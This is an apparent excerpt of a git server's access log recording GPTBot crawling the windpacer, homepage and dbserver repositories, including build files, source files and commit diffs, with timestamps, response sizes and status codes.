GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17182] [Gzip 9.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940517] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18321] [Gzip 11.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13011] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:10:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" -[17/Feb/2026:13:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13144] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services" -[17/Feb/2026:13:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.diff" [Client 74.7.227.38] [Length 3429231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:13:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" [Client 74.7.227.38] [Length 11985] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" -[17/Feb/2026:13:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm" [Client 74.7.227.38] [Length 10166] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" -[17/Feb/2026:13:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" -[17/Feb/2026:13:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" [Client 74.7.227.38] [Length 12743] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13136] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services" -[17/Feb/2026:13:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16545] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 17340] [Gzip 9.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" [Client 74.7.227.38] [Length 17056] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:13:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 74.7.227.38] [Length 15370] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" -[17/Feb/2026:13:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 16958] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 74.7.227.38] [Length 10795] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" -[17/Feb/2026:13:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" -[17/Feb/2026:13:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e.patch" [Client 74.7.227.38] [Length 287418] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:13:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" [Client 74.7.227.38] [Length 26302] [Gzip 5.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:13:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" [Client 74.7.227.38] [Length 15274] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:13:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13141] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services" -[17/Feb/2026:13:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11283] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" -[17/Feb/2026:13:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 10746] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm" -[17/Feb/2026:13:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11971] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" [Client 74.7.227.38] [Length 11148] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:13:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" -[17/Feb/2026:13:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" [Client 74.7.227.38] [Length 10967] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:13:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12934] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" -[17/Feb/2026:13:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" [Client 74.7.227.38] [Length 11961] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:13:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" -[17/Feb/2026:13:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" -[17/Feb/2026:13:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt" [Client 74.7.227.38] [Length 9871] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" -[17/Feb/2026:13:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 9933] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" -[17/Feb/2026:13:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" [Client 74.7.227.38] [Length 10681] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12938] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" -[17/Feb/2026:13:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12936] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" -[17/Feb/2026:13:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" [Client 74.7.227.38] [Length 9908] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" -[17/Feb/2026:13:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" [Client 74.7.227.38] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" -[17/Feb/2026:13:10:57 